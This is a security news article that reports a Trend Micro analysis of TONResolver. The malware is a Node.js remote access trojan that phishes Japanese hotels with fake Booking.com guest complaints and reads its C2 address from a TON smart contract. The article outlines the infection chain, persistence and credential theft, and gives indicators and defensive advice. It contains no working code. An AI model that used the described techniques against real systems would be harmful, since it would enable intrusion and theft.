TONResolver Malware Uses TON Blockchain to Switch C2 Servers in Japan Hotel Phishing Campaign


A new malware campaign is targeting Japanese accommodation businesses with phishing emails that impersonate Booking.com-related guest complaints and review requests.

The malware, tracked as TONResolver, uses The Open Network blockchain to hide and update its command-and-control server address. According to Trend Micro’s report, attackers began sending the phishing emails in late May 2026 to Japanese partner companies that use Booking.com.

The main risk is not only the first infection. Once TONResolver runs on a victim’s system, it can keep a live connection with attacker infrastructure, send endpoint information, and wait for additional commands.

TONResolver turns blockchain into a C2 lookup system

TONResolver stands out because it does not store a fixed command-and-control domain inside the malware. Instead, it queries a TON smart contract through the TON API service and retrieves the current attacker-controlled server address from the blockchain.

This technique is known as a dead drop resolver. In simple terms, the malware checks an outside location for instructions on where to connect next. If defenders block one server, the attacker can update the smart contract and redirect infected machines to a new server.

The technique fits the broader MITRE ATT&CK Dynamic Resolution category, where attackers dynamically change command-and-control connection details to avoid detection and takedown.

How the phishing campaign works

The campaign starts with emails written to look like urgent hotel business messages. Some emails claim that a guest submitted a serious complaint. Others ask staff to review stay-related photos, videos, or attached evidence.

Trend Micro observed two main delivery methods. One used bulk phishing emails with Japanese-language subjects such as “Important: Guest Stay Review Request.” The other used a conversational approach through Gmail, where the attacker first sent a normal inquiry and delivered the malicious link only after the hotel replied.

This trust-building step makes the campaign harder for staff to spot. A hotel employee may expect follow-up messages from guests, especially when the topic involves complaints, reservations, or room availability.

StageWhat happensWhy it matters
Phishing emailAttackers send Booking.com-themed complaint or inquiry messagesHotel staff are pushed to click a link quickly
ZIP downloadThe link downloads an archive from attacker infrastructureThe malware arrives disguised as business-related material
LNK executionA shortcut file disguised as a photo launches PowerShellUser execution starts the infection chain
PowerShell scriptThe script downloads and prepares the payloadThe attack uses native Windows scripting to move forward
Node.js runtimeNode.js is downloaded and placed under the user profileA legitimate runtime executes the malicious JavaScript file
TONResolverThe malware queries TON and connects to the retrieved C2 serverAttackers can switch infrastructure without changing the payload

Node.js helps the malware blend in

The payload is a JavaScript file executed with Node.js. In observed samples, the malware retrieved Node.js version 24.13.0 from the official Node.js distribution path if node.exe was not already present.

The runtime and payload were placed under the user’s AppData folder. This helped the malware run without installing a traditional executable in a more obvious location.

TONResolver also uses VM-based obfuscation. Its logic is converted into a custom virtual instruction set, which makes static analysis harder and slows down detection engineering.

What TONResolver does after infection

After execution, TONResolver checks whether another copy is already running, sets persistence through the Windows registry Run key, then performs a connectivity check.

It then calls the TON smart contract through the TON API REST service using a method named get_domain. The returned value gives the malware the active command-and-control server.

Email sample generated by organizing information from reported emails (Source – Trend Micro)

After connecting, the malware uses encrypted WebSocket communication. Trend Micro reported the use of ECDH, HKDF-SHA256, and AES-256-CBC for its command-and-control traffic, making simple network string inspection less effective.

  • Checks for duplicate execution through a mutex-style mechanism
  • Sets persistence through HKCU registry Run keys
  • Queries tonapi[.]io for the active C2 domain
  • Sends endpoint data such as username, hostname, OS, CPU, memory, and MAC address
  • Maintains a keepalive loop with the attacker-controlled server
  • Supports follow-on command execution and payload delivery

Credential theft followed some infections

Trend Micro said the malware does not immediately steal files or credentials at the first stage. Instead, it appears to give attackers a foothold that can support later command execution.

Observed follow-on activity included attempts to steal credentials and browser data. The targets included Chrome and Edge passwords, cookies, history, and autofill content.

This matters for hotels because one infected front-desk or back-office machine can expose booking portals, email accounts, payment-related workflows, and partner systems. Credential theft can also let attackers return later through legitimate accounts.

Why the TON smart contract method is difficult to disrupt

Blocking one C2 domain may not end the infection. The attacker can write a new domain into the TON smart contract, and infected systems can retrieve the new destination during the next lookup.

That is why the campaign aligns with the dynamic resolution technique. The malware separates the payload from its current infrastructure, giving attackers more room to recover when defenders block domains.

Trend Micro’s blockchain analysis found multiple C2 domain changes written to the TON contract, including entries from February 2026 and June 2026. This shows the resolver mechanism was not only theoretical, but actively used.

Indicator typeIndicatorDescription
Detection nameTrojanSpy.JS.TONRESOLVER.ATrend Micro detection for the JavaScript RAT payload
TON API domaintonapi[.]ioLegitimate TON API service abused for C2 resolution
TON methodmethods/get_domainSmart contract method used to retrieve the active C2 domain
Resolver contract0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9TON contract used to store the C2 domain
Updater contract0:6d5b44d0678e6bd6703f2cabd2531ccf5a0b11cc081f8f7175bd679db4c12d41Attacker-controlled TON contract tied to C2 updates
Payload path%USERPROFILE%\AppData\Local\Nodejs\{filename}.jsLocation where the JavaScript payload is saved
Node.js path%USERPROFILE%\AppData\Local\Nodejs\node-v24.13.0-win-x64\Directory used for the Node.js runtime
Persistence keyHKCU\Software\Microsoft\Windows\CurrentVersion\RunRegistry location used to restart the malware

Defenders should watch PowerShell, Node.js, and TON traffic

Hotels and managed IT providers supporting accommodation businesses should review endpoint telemetry for PowerShell downloading scripts from suspicious domains. They should also check for Node.js running from AppData paths rather than approved development folders.

The Trend Micro recommendations include restricting connectivity to TON services where they are not needed for business operations. Blocking tonapi[.]io can interrupt the resolver stage of this attack chain.

Files contained in the zip archive (Source – Trend Micro)

Security teams should also train hotel staff to treat complaint-themed emails with caution. Messages that ask staff to download photos, videos, or evidence through external links deserve extra review, even when they appear to concern a real reservation issue.

  • Block or monitor access to tonapi[.]io where blockchain access is not required
  • Restrict PowerShell from retrieving files from the internet
  • Alert on node.exe running from AppData or temporary user folders
  • Inspect LNK files delivered inside ZIP archives
  • Review registry Run keys for suspicious JavaScript or Node.js execution
  • Reset passwords and browser sessions on systems that show signs of compromise
  • Monitor hotel booking, email, and payment-related accounts for suspicious logins

Japan’s hotel sector remains the primary target

The campaign currently centers on Japanese accommodation facilities, but the technique can spread to other regions and industries. Any organization that relies heavily on email-based customer communication could face similar lures.

TONResolver also shows how attackers can combine familiar phishing, legitimate runtimes, blockchain infrastructure, and encrypted communication into one infection chain. Each layer makes the activity harder to stop with a single control.

The practical response is clear. Organizations should reduce unnecessary blockchain access, harden script execution, monitor unusual Node.js behavior, and investigate any endpoint that recently opened suspicious guest complaint archives.

FAQ

What is TONResolver malware?

TONResolver is a JavaScript-based remote access trojan that runs through Node.js. It uses a TON smart contract to retrieve its current command-and-control server address.

Who is TONResolver targeting?

Trend Micro reported that the observed campaign targeted Japanese accommodation facilities that use Booking.com, mainly through phishing emails disguised as guest complaints, review requests, or hotel inquiries.

How does TONResolver use the TON blockchain?

TONResolver queries a TON smart contract through tonapi.io and retrieves the active C2 domain from a method called get_domain. This lets attackers change the server address without changing the malware file.

Why does TONResolver use Node.js?

The malware uses Node.js to execute its JavaScript payload. In observed attacks, the runtime was downloaded and stored under the user profile, which helped the payload run through a legitimate platform.

How can organizations defend against TONResolver?

Organizations should restrict unnecessary access to TON services, block PowerShell from downloading external files where possible, monitor node.exe running from AppData, inspect LNK files in ZIP archives, and review registry Run keys for suspicious persistence.

Readers help support VPNCentral. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more

User forum

0 messages